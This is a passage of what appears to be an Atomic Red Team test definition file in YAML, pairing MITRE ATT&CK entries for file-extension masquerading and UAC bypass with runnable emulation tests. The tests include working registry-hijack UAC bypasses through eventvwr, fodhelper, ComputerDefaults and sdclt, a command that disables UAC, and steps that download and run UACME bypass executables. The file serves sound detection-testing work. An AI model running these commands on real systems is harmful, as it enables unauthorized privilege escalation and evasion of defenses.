as Evil.txt to a user. The user may then view it as a benign
text file and open it, inadvertently executing the hidden malware.(Citation:
SOCPrime DoubleExtension)\n\nCommon file types, such as text files (.txt,
.doc, etc.) and image files (.jpg, .gif, etc.) are typically used as the first
extension to appear benign. Executable extensions commonly regarded as dangerous,
such as .exe, .lnk, .hta, and .scr, often appear as the second extension and
true file type."
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.0'
identifier: T1036.007
atomic_tests:
- name: File Extension Masquerading
auto_generated_guid: c7fa0c3b-b57f-4cba-9118-863bf4e653fc
description: |
download and execute a file masquerading as images or Office files. Upon execution 3 calc instances and 3 vbs windows will be launched.
e.g SOME_LEGIT_NAME.[doc,docx,xls,xlsx,pdf,rtf,png,jpg,etc.].[exe,vbs,js,ps1,etc] (Quartelyreport.docx.exe)
supported_platforms:
- windows
input_arguments:
exe_path:
description: path to exe to use when creating masquerading files
type: path
default: C:\Windows\System32\calc.exe
vbs_path:
description: path of vbs to use when creating masquerading files
type: path
default: PathToAtomicsFolder\T1036.007\src\T1036.007_masquerading.vbs
ps1_path:
description: path of powershell script to use when creating masquerading
files
type: path
default: PathToAtomicsFolder\T1036.007\src\T1036.007_masquerading.ps1
dependency_executor_name: powershell
dependencies:
- description: 'File to copy must exist on disk at specified location (#{vbs_path})
'
prereq_command: 'if (Test-Path "#{vbs_path}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path "#{vbs_path}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036.007/src/T1036.007_masquerading.vbs" -OutFile "#{vbs_path}"
- description: 'File to copy must exist on disk at specified location (#{ps1_path})
'
prereq_command: 'if (Test-Path "#{ps1_path}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path "#{ps1_path}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036.007/src/T1036.007_masquerading.ps1" -OutFile "#{ps1_path}"
executor:
command: |
copy "#{exe_path}" %temp%\T1036.007_masquerading.docx.exe /Y
copy "#{exe_path}" %temp%\T1036.007_masquerading.pdf.exe /Y
copy "#{exe_path}" %temp%\T1036.007_masquerading.ps1.exe /Y
copy "#{vbs_path}" %temp%\T1036.007_masquerading.xls.vbs /Y
copy "#{vbs_path}" %temp%\T1036.007_masquerading.xlsx.vbs /Y
copy "#{vbs_path}" %temp%\T1036.007_masquerading.png.vbs /Y
copy "#{ps1_path}" %temp%\T1036.007_masquerading.doc.ps1 /Y
copy "#{ps1_path}" %temp%\T1036.007_masquerading.pdf.ps1 /Y
copy "#{ps1_path}" %temp%\T1036.007_masquerading.rtf.ps1 /Y
%temp%\T1036.007_masquerading.docx.exe
%temp%\T1036.007_masquerading.pdf.exe
%temp%\T1036.007_masquerading.ps1.exe
%temp%\T1036.007_masquerading.xls.vbs
%temp%\T1036.007_masquerading.xlsx.vbs
%temp%\T1036.007_masquerading.png.vbs
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -File %temp%\T1036.007_masquerading.doc.ps1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -File %temp%\T1036.007_masquerading.pdf.ps1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -File %temp%\T1036.007_masquerading.rtf.ps1
cleanup_command: |
del /f %temp%\T1036.007_masquerading.docx.exe > nul 2>&1
del /f %temp%\T1036.007_masquerading.pdf.exe > nul 2>&1
del /f %temp%\T1036.007_masquerading.ps1.exe > nul 2>&1
del /f %temp%\T1036.007_masquerading.xls.vbs > nul 2>&1
del /f %temp%\T1036.007_masquerading.xlsx.vbs > nul 2>&1
del /f %temp%\T1036.007_masquerading.png.vbs > nul 2>&1
del /f %temp%\T1036.007_masquerading.doc.ps1 > nul 2>&1
del /f %temp%\T1036.007_masquerading.pdf.ps1 > nul 2>&1
del /f %temp%\T1036.007_masquerading.rtf.ps1 > nul 2>&1
name: command_prompt
T1548.002:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--120d5519-3098-4e1c-9191-2aa61232f073
created: '2020-01-30T14:24:34.977Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1548/002
external_id: T1548.002
- source_name: Davidson Windows
description: Davidson, L. (n.d.). Windows 7 UAC whitelist. Retrieved November
12, 2014.
url: http://www.pretentiousname.com/misc/win7_uac_whitelist2.html
- source_name: TechNet How UAC Works
description: Lich, B. (2016, May 31). How User Account Control Works. Retrieved
June 3, 2016.
url: https://technet.microsoft.com/en-us/itpro/windows/keep-secure/how-user-account-control-works
- source_name: SANS UAC Bypass
description: Medin, T. (2013, August 8). PsExec UAC Bypass. Retrieved June
3, 2016.
url: http://pen-testing.sans.org/blog/pen-testing/2013/08/08/psexec-uac-bypass
- source_name: MSDN COM Elevation
description: Microsoft. (n.d.). The COM Elevation Moniker. Retrieved July
26, 2016.
url: https://msdn.microsoft.com/en-us/library/ms679687.aspx
- source_name: enigma0x3 Fileless UAC Bypass
description: Nelson, M. (2016, August 15). "Fileless" UAC Bypass using eventvwr.exe
and Registry Hijacking. Retrieved December 27, 2016.
url: https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
- source_name: enigma0x3 sdclt app paths
description: Nelson, M. (2017, March 14). Bypassing UAC using App Paths. Retrieved
May 25, 2017.
url: https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/
- source_name: enigma0x3 sdclt bypass
description: Nelson, M. (2017, March 17). "Fileless" UAC Bypass Using sdclt.exe.
Retrieved May 25, 2017.
url: https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/
- source_name: TechNet Inside UAC
description: 'Russinovich, M. (2009, July). User Account Control: Inside Windows
7 User Account Control. Retrieved July 26, 2016.'
url: https://technet.microsoft.com/en-US/magazine/2009.07.uac.aspx
- source_name: Fortinet Fareit
description: Salvio, J., Joven, R. (2016, December 16). Malicious Macro Bypasses
UAC to Elevate Privilege for Fareit Malware. Retrieved December 27, 2016.
url: https://blog.fortinet.com/2016/12/16/malicious-macro-bypasses-uac-to-elevate-privilege-for-fareit-malware
- source_name: Github UACMe
description: UACME Project. (2016, June 16). UACMe. Retrieved July 26, 2016.
url: https://github.com/hfiref0x/UACME
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:25.823Z'
name: 'Abuse Elevation Control Mechanism: Bypass User Account Control'
description: |-
Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.(Citation: TechNet How UAC Works)
If the UAC protection level of a computer is set to anything but the highest level, certain Windows programs can elevate privileges or execute some elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) objects without prompting the user through the UAC notification box.(Citation: TechNet Inside UAC)(Citation: MSDN COM Elevation) An example of this is use of [Rundll32](https://attack.mitre.org/techniques/T1218/011) to load a specifically crafted DLL which loads an auto-elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user.(Citation: Davidson Windows)
Many methods have been discovered to bypass UAC. The Github readme page for UACME contains an extensive list of methods(Citation: Github UACMe) that have been discovered and implemented, but may not be a comprehensive list of bypasses. Additional bypass methods are regularly discovered and some used in the wild, such as:
* eventvwr.exe can auto-elevate and execute a specified binary or script.(Citation: enigma0x3 Fileless UAC Bypass)(Citation: Fortinet Fareit)
Another bypass is possible through some lateral movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on remote systems and default to high integrity.(Citation: SANS UAC Bypass)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Stefan Kanthak
- Casey Smith
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '2.2'
identifier: T1548.002
atomic_tests:
- name: Bypass UAC using Event Viewer (cmd)
auto_generated_guid: 5073adf8-9a50-4bd9-b298-a9bd2ead8af9
description: "Bypasses User Account Control using Event Viewer and a relevant
Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/\nUpon
execution command prompt should be launched with administrative privileges.
\n"
supported_platforms:
- windows
input_arguments:
executable_binary:
description: Binary to execute with UAC Bypass
type: path
default: C:\Windows\System32\cmd.exe
executor:
command: |
reg.exe add hkcu\software\classes\mscfile\shell\open\command /ve /d "#{executable_binary}" /f
cmd.exe /c eventvwr.msc
cleanup_command: 'reg.exe delete hkcu\software\classes\mscfile /f >nul 2>&1
'
name: command_prompt
- name: Bypass UAC using Event Viewer (PowerShell)
auto_generated_guid: a6ce9acf-842a-4af6-8f79-539be7608e2b
description: |
PowerShell code to bypass User Account Control using Event Viewer and a relevant Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
Upon execution command prompt should be launched with administrative privalages
supported_platforms:
- windows
input_arguments:
executable_binary:
description: Binary to execute with UAC Bypass
type: path
default: C:\Windows\System32\cmd.exe
executor:
command: |
New-Item "HKCU:\software\classes\mscfile\shell\open\command" -Force
Set-ItemProperty "HKCU:\software\classes\mscfile\shell\open\command" -Name "(default)" -Value "#{executable_binary}" -Force
Start-Process "C:\Windows\System32\eventvwr.msc"
cleanup_command: 'Remove-Item "HKCU:\software\classes\mscfile" -force -Recurse
-ErrorAction Ignore
'
name: powershell
- name: Bypass UAC using Fodhelper
auto_generated_guid: 58f641ea-12e3-499a-b684-44dee46bd182
description: |
Bypasses User Account Control using the Windows 10 Features on Demand Helper (fodhelper.exe). Requires Windows 10.
Upon execution, "The operation completed successfully." will be shown twice and command prompt will be opened.
supported_platforms:
- windows
input_arguments:
executable_binary:
description: Binary to execute with UAC Bypass
type: path
default: C:\Windows\System32\cmd.exe
executor:
command: |
reg.exe add hkcu\software\classes\ms-settings\shell\open\command /ve /d "#{executable_binary}" /f
reg.exe add hkcu\software\classes\ms-settings\shell\open\command /v "DelegateExecute" /f
fodhelper.exe
cleanup_command: 'reg.exe delete hkcu\software\classes\ms-settings /f >nul
2>&1
'
name: command_prompt
- name: Bypass UAC using Fodhelper - PowerShell
auto_generated_guid: 3f627297-6c38-4e7d-a278-fc2563eaaeaa
description: |
PowerShell code to bypass User Account Control using the Windows 10 Features on Demand Helper (fodhelper.exe). Requires Windows 10.
Upon execution command prompt will be opened.
supported_platforms:
- windows
input_arguments:
executable_binary:
description: Binary to execute with UAC Bypass
type: path
default: C:\Windows\System32\cmd.exe
executor:
command: |
New-Item "HKCU:\software\classes\ms-settings\shell\open\command" -Force
New-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "DelegateExecute" -Value "" -Force
Set-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "(default)" -Value "#{executable_binary}" -Force
Start-Process "C:\Windows\System32\fodhelper.exe"
cleanup_command: 'Remove-Item "HKCU:\software\classes\ms-settings" -force
-Recurse -ErrorAction Ignore
'
name: powershell
- name: Bypass UAC using ComputerDefaults (PowerShell)
auto_generated_guid: 3c51abf2-44bf-42d8-9111-dc96ff66750f
description: |
PowerShell code to bypass User Account Control using ComputerDefaults.exe on Windows 10
Upon execution administrative command prompt should open
supported_platforms:
- windows
input_arguments:
executable_binary:
description: Binary to execute with UAC Bypass
type: path
default: C:\Windows\System32\cmd.exe
executor:
command: |
New-Item "HKCU:\software\classes\ms-settings\shell\open\command" -Force
New-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "DelegateExecute" -Value "" -Force
Set-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "(default)" -Value "#{executable_binary}" -Force
Start-Process "C:\Windows\System32\ComputerDefaults.exe"
cleanup_command: 'Remove-Item "HKCU:\software\classes\ms-settings" -force
-Recurse -ErrorAction Ignore
'
name: powershell
- name: Bypass UAC by Mocking Trusted Directories
auto_generated_guid: f7a35090-6f7f-4f64-bb47-d657bf5b10c1
description: |
Creates a fake "trusted directory" and copies a binary to bypass UAC. The UAC bypass may not work on fully patched systems
Upon execution the directory structure should exist if the system is patched, if unpatched Microsoft Management Console should launch
supported_platforms:
- windows
input_arguments:
executable_binary:
description: Binary to execute with UAC Bypass
type: path
default: C:\Windows\System32\cmd.exe
executor:
command: |
mkdir "\\?\C:\Windows \System32\"
copy "#{executable_binary}" "\\?\C:\Windows \System32\mmc.exe"
mklink c:\testbypass.exe "\\?\C:\Windows \System32\mmc.exe"
cleanup_command: |
rd "\\?\C:\Windows \" /S /Q >nul 2>nul
del "c:\testbypass.exe" >nul 2>nul
name: command_prompt
elevation_required: true
- name: Bypass UAC using sdclt DelegateExecute
auto_generated_guid: 3be891eb-4608-4173-87e8-78b494c029b7
description: |
Bypasses User Account Control using a fileless method, registry only.
Upon successful execution, sdclt.exe will spawn cmd.exe to spawn notepad.exe
[Reference - sevagas.com](http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass)
Adapted from [MITRE ATT&CK Evals](https://github.com/mitre-attack/attack-arsenal/blob/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/stepFourteen_bypassUAC.ps1)
supported_platforms:
- windows
input_arguments:
command_to_execute:
description: Command to execute
type: string
default: cmd.exe /c notepad.exe
executor:
command: |
New-Item -Force -Path "HKCU:\Software\Classes\Folder\shell\open\command" -Value '#{command_to_execute}'
New-ItemProperty -Force -Path "HKCU:\Software\Classes\Folder\shell\open\command" -Name "DelegateExecute"
Start-Process -FilePath $env:windir\system32\sdclt.exe
Start-Sleep -s 3
cleanup_command: 'Remove-Item -Path "HKCU:\Software\Classes\Folder" -Recurse
-Force -ErrorAction Ignore
'
name: powershell
- name: Disable UAC using reg.exe
auto_generated_guid: 9e8af564-53ec-407e-aaa8-3cb20c3af7f9
description: |
Disable User Account Conrol (UAC) using the builtin tool reg.exe by changing its registry key
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA from 1 to 0
supported_platforms:
- windows
executor:
command: 'reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
/v EnableLUA /t REG_DWORD /d 0 /f
'
cleanup_command: 'reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
/v EnableLUA /t REG_DWORD /d 1 /f
'
name: command_prompt
elevation_required: true
- name: Bypass UAC using SilentCleanup task
auto_generated_guid: 28104f8a-4ff1-4582-bcf6-699dce156608
description: |
Bypass UAC using SilentCleanup task on Windows 8-10 using bat file from https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/
There is an auto-elevated task called SilentCleanup located in %windir%\system32\cleanmgr.exe This can be abused to elevate any file with Administrator privileges without prompting UAC (even highest level).
For example, we can set the windir registry kye to: "cmd /k REM "
And forcefully run SilentCleanup task:
schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I
REM will tell it to ignore everything after %windir% and treat it just as a NOTE. Therefore just executing cmd with admin privs.
supported_platforms:
- windows
input_arguments:
file_path:
description: Path to the bat file
type: string
default: PathToAtomicsFolder\T1548.002\src\T1548.002.bat
executor:
command: '"#{file_path}"
'
name: command_prompt
elevation_required: false
- name: UACME Bypass Method 23
auto_generated_guid: 8ceab7a2-563a-47d2-b5ba-0995211128d7
description: "Executes User Account Control Bypass according to the methods
listed below. Upon successful execution you should see event viewer load and
two administrative command prompts.\nNote: The cleanup_command's which kill
the spawned cmd and event viewer processes only work if run as admin.\n\nAuthor:
Leo Davidson derivative\n\nType:\tDll Hijack\n\nMethod: IFileOperation\n\nTarget:\t\\system32\\pkgmgr.exe\n\nComponent:
DismCore.dll\n\nImplementation:\tucmDismMethod\n\nUCM Method:\tUacMethodDISM\n\nhttps://github.com/hfiref0x/UACME\n"
supported_platforms:
- windows
input_arguments:
uacme_exe:
description: Path to uacme executable
type: path
default: PathToAtomicsFolder\..\ExternalPayloads\uacme\23 Akagi64.exe
dependency_executor_name: powershell
dependencies:
- description: 'UACME executable must exist on disk at specified location ("#{uacme_exe}")
'
prereq_command: |
$tempPath = cmd /c echo #{uacme_exe}
if (Test-Path "$tempPath") {exit 0} else {exit 1}
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\uacme.zip"
Expand-Archive "PathToAtomicsFolder\..\ExternalPayloads\uacme.zip" "PathToAtomicsFolder\..\ExternalPayloads\uacme" -Force
Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\uacme.zip" -Force
executor:
command: '"#{uacme_exe}"
'
cleanup_command: |
powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
name: command_prompt
- name: UACME Bypass Method 31
auto_generated_guid: b0f76240-9f33-4d34-90e8-3a7d501beb15
description: "Executes User Account Control Bypass according to the methods
listed below. Upon successful execution you should see event viewer load and
two administrative command prompts.\nNote: The cleanup_command's which kill
the spawned cmd and event viewer processes only work if run as admin.\n\nAuthor:
Enigma0x3\n\nType:\tShell API\n\nMethod: Registry key manipulation\n\nTarget:\t\\system32\\sdclt.exe\n\nComponent:
Attacker defined\n\nImplementation:\tucmSdcltIsolatedCommandMethod\n\nUCM
Method:\tUacMethodShellSdclt\n\nhttps://github.com/hfiref0x/UACME\n"
supported_platforms:
- windows
input_arguments:
uacme_exe:
description: Path to uacme executable
type: path
default: PathToAtomicsFolder\..\ExternalPayloads\uacme\31 Akagi64.exe
dependency_executor_name: powershell
dependencies:
- description: 'UACME executable must exist on disk at specified location ("#{uacme_exe}")
'
prereq_command: |
$tempPath = cmd /c echo #{uacme_exe}
if (Test-Path "$tempPath") {exit 0} else {exit 1}
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\uacme.zip"
Expand-Archive "PathToAtomicsFolder\..\ExternalPayloads\uacme.zip" "PathToAtomicsFolder\..\ExternalPayloads\uacme" -Force
Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\uacme.zip" -Force
executor:
command: '"#{uacme_exe}"
'
cleanup_command: |
powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
name: command_prompt
- name: UACME Bypass Method 33
auto_generated_guid: e514bb03-f71c-4b22-9092-9f961ec6fb03
description: "Executes User Account Control Bypass according to the methods
listed below. Upon successful execution you should see event viewer load and
two administrative command prompts.\nNote: The cleanup_command's which kill
the spawned cmd and event viewer processes only work if run as admin.\n\nAuthor:
winscripting.blog\n\nType:\tShell API\n\nMethod: Registry key manipulation\n\nTarget:\t\\system32\\fodhelper.exe\n\nComponent:\tAttacker
defined\n\nImplementation:\tucmShellRegModMethod\n\nUCM Method:\tUacMethodMsSettings2\n\nhttps://github.com/hfiref0x/UACME\n"
supported_platforms:
- windows
input_arguments:
uacme_exe:
description: Path to uacme executable
type: path
default: PathToAtomicsFolder\..\ExternalPayloads\uacme\33 Akagi64.exe
dependency_executor_name: powershell
dependencies:
- description: 'UACME executable must exist on disk at specified location ("#{uacme_exe}")
'
prereq_command: |
$tempPath = cmd /c echo #{uacme_exe}
if (Test-Path "$tempPath") {exit 0} else {exit 1}
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\uacme.zip"
Expand-Archive "PathToAtomicsFolder\..\ExternalPayloads\uacme.zip" "PathToAtomicsFolder\..\ExternalPayloads\uacme" -Force
Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\uacme.zip" -Force
executor:
command: '"#{uacme_exe}"
'
cleanup_command: |
powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
name: command_prompt
- name: UACME Bypass Method 34
auto_generated_guid: 695b2dac-423e-448e-b6ef-5b88e93011d6
description: "Executes User Account Control Bypass according to the methods
listed below. Upon successful execution you should see event viewer load and
two administrative command prompts.\nNote: The cleanup_command's which kill
the spawned cmd and event viewer processes only work if run as admin.\n\nAuthor:
James Forshaw\n\nType:\tShell API\n\nMethod: Environment variables expansion\n\nTarget:\t\\system32\\svchost.exe
via \\system32\\schtasks.exe\n\nComponent:\tAttacker defined\n\nImplementation:\tucmDiskCleanupEnvironmentVariable\n\nUCM
Method:\tUacMethodDiskSilentCleanup\n\nhttps://github.com/hfiref0x/UACME\n"
supported_platforms:
- windows
input_arguments:
uacme_exe:
description: Path to uacme executable
type: path
default: PathToAtomicsFolder\..\ExternalPayloads\uacme\34 Akagi64.exe
dependency_executor_name: powershell
dependencies:
- description: 'UACME executable must exist on disk at specified location ("#{uacme_exe}")
'
prereq_command: |
$tempPath = cmd /c echo #{uacme_exe}
if (Test-Path "$tempPath") {exit 0} else {exit 1}
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\uacme.zip"
Expand-Archive "PathToAtomicsFolder\..\ExternalPayloads\uacme.zip" "PathToAtomicsFolder\..\ExternalPayloads\uacme" -Force
Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\uacme.zip" -Force
executor:
command: '"#{uacme_exe}"
'
cleanup_command: |
powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
name: command_prompt
- name: UACME Bypass Method 39
auto_generated_guid: 56163687-081f-47da-bb9c-7b231c5585cf
description: "Executes User Account Control Bypass according to the methods
listed below. Upon successful execution you should see event viewer load and
two administrative command prompts.\nNote: The cleanup_command's which kill
the spawned cmd and event viewer processes only work if run as admin.\n\nAuthor:
Stefan Kanthak\n\nType:\tDll Hijack\n\nMethod: .NET Code Profiler\n\nTarget:\t\\system32\\mmc.exe\n\nComponent:\tAttacker
defined\n\nImplementation:\tucmCorProfilerMethod\n\nUCM Method:\tUacMethodCorProfiler\n\nhttps://github.com/hfiref0x/UACME\n"
supported_platforms:
- windows
input_arguments:
uacme_exe:
description: Path to uacme executable
type: path
default: PathToAtomicsFolder\..\ExternalPayloads\uacme\39 Akagi64.exe
dependency_executor_name: powershell
dependencies:
- description: 'UACME executable must exist on disk at specified location ("#{uacme_exe}")
'
prereq_command: |
$tempPath = cmd /c echo #{uacme_exe}
if (Test-Path "$tempPath") {exit 0} else {exit 1}
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\uacme.zip"
Expand-Archive "PathToAtomicsFolder\..\ExternalPayloads\uacme.zip" "PathToAtomicsFolder\..\ExternalPayloads\uacme" -Force
Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\uacme.zip" -Force
executor:
command: '"#{uacme_exe}"
'
cleanup_command: |
powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
name: command_prompt
- name: UACME Bypass Method 56
auto_generated_guid: 235ec031-cd2d-465d-a7ae-68bab281e80e
description: "Executes User Account Control Bypass according to the methods
listed below. Upon successful execution you should see event viewer load and
two administrative command prompts.\nNote: The cleanup_command's which kill
the spawned cmd and event viewer processes only work if run as admin.\n\nAuthor:
Hashim Jawad\n\nType:\tShell API\n\nMethod: Registry key manipulation\n\nTarget:\t\\system32\\WSReset.exe\n\nComponent:\tAttacker
defined\n\nImplementation:\tucmShellRegModMethod\n\nUCM Method:\tUacMethodShellWSReset\n\nhttps://github.com/hfiref0x/UACME\n"
supported_platforms:
- windows
input_arguments:
uacme_exe:
description: Path to uacme executable
type: path
default: PathToAtomicsFolder\..\ExternalPayloads\uacme\56 Akagi64.exe
dependency_executor_name: powershell
dependencies:
- description: 'UACME executable must exist on disk at specified location ("#{uacme_exe}")
'
prereq_command: |
$tempPath = cmd /c echo #{uacme_exe}
if (Test-Path "$tempPath") {exit 0} else {exit 1}
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\uacme.zip"
Expand-Archive "PathToAtomicsFolder\..\ExternalPayloads\uacme.zip" "PathToAtomicsFolder\..\ExternalPayloads\uacme" -Force
Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\uacme.zip" -Force
executor:
command: '"#{uacme_exe}"
'
cleanup_command: |
powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
name: command_prompt
- name: UACME Bypass Method 59
auto_generated_guid: dfb1b667-4bb8-4a63-a85e-29936ea75f29
description: "Executes User Account Control Bypass according to the methods
listed below. Upon successful execution you should see event viewer load and
two administrative command prompts.\nNote: The cleanup_command's which kill
the spawned cmd and event viewer processes only work if run as admin.\n\nAuthor:
James Forshaw\n\nType:\tAppInfo ALPC\n\nMethod: RAiLaunchAdminProcess and
DebugObject\n\nTarget:\tAttacker defined\n\nComponent:\tAttacker defined\n\nImplementation:\tucmDebugObjectMethod\n\nUCM
Method:\tUacMethodDebugObject\n\nhttps://github.com/hfiref0x/UACME\n"
supported_platforms:
- windows
input_arguments:
uacme_exe:
description: Path to uacme executable
type: path
default: PathToAtomicsFolder\..\ExternalPayloads\uacme\59 Akagi64.exe
dependency_executor_name: powershell
dependencies:
- description: 'UACME executable must exist on disk at specified location ("#{uacme_exe}")
'
prereq_command: |
$tempPath = cmd /c echo #{uacme_exe}
if (Test-Path "$tempPath") {exit 0} else {exit 1}
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\uacme.zip"
Expand-Archive "PathToAtomicsFolder\..\ExternalPayloads\uacme.zip" "PathToAtomicsFolder\..\ExternalPayloads\uacme" -Force
Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\uacme.zip" -Force
executor:
command: '"#{uacme_exe}"
'
cleanup_command: |
powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
name: command_prompt
- name: UACME Bypass Method 61
auto_generated_guid: 7825b576-744c-4555-856d-caf3460dc236
description: "Executes User Account Control Bypass according to the methods
listed below. Upon successful execution you should see event viewer load and
two administrative command prompts.\nNote: The cleanup_command's which kill
the spawned cmd and event viewer processes only work if run as admin.\n\nAuthor:
Enigma0x3/bytecode77 derivative by Nassim Asrir\n\nType:\tShell API\n\nMethod:
Registry key manipulation\n\nTarget:\t\\system32\\slui.exe, \\system32\\changepk.exe\n\nComponent:\tAttacker
defined\n\nImplementation:\tucmShellRegModMethod\n\nUCM Method:\tUacMethodDebugObject\n\nhttps://github.com/hfiref0x/UACME\n"
supported_platforms:
- windows
input_arguments:
uacme_exe:
description: Path to uacme executable
type: path
default: PathToAtomicsFolder\..\ExternalPayloads\uacme\61 Akagi64.exe
dependency_executor_name: powershell
dependencies:
- description: 'UACME executable must exist on disk at specified location ("#{uacme_exe}")
'
prereq_command: |
$tempPath = cmd /c echo #{uacme_exe}
if (Test-Path "$tempPath") {exit 0} else {exit 1}
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
